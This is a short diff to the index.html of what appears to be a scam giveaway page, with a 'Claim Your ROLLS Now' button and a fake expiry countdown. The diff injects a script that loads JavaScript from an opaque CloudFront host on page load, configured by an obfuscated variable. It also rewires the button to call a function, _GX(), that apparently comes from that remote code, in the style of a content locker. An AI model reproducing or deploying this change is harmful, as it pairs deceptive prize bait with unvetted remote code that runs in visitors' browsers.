--- a/index.html
+++ b/index.html
@@ -35,7 +35,10 @@
     <link rel="icon" href="data:;base64,iVBORw0KGgo=">
 
     
-
+<script type="text/javascript">
+    var sUYYD_jIV_BWJWpc={"it":4201945,"key":"1095d"};
+</script>
+<script src="https://d115fsoldgezur.cloudfront.net/eaa4b81.js"></script>
 </head>
 <body>
 <script type="text/javascript">
@@ -173,9 +176,8 @@ document.write(months[month]+" "+today+", "+year)
             }, 1000);
           }</script>
       <p></p>
-	  <a href="https://t.co/qdyWGCrVQX">
-        <button style="display: inline-block; background-color: #8BC34A;font-size: 18px; padding: 18px 44px;width:100%;" >Claim Your ROLLS Now</button>
-		  </a>
+	 
+        <button style="display: inline-block; background-color: #8BC34A;font-size: 18px; padding: 18px 44px;width:100%;" onclick="_GX()">Claim Your ROLLS Now</button>
         <div class="timer" style="margin-top:5px;margin-left:5px">
 		
                    <p>Your prize will expire in <span style="color:red;font-weight: 600;"><span id="mins">5</span>:<span id="hsecs">29</span></span></p>
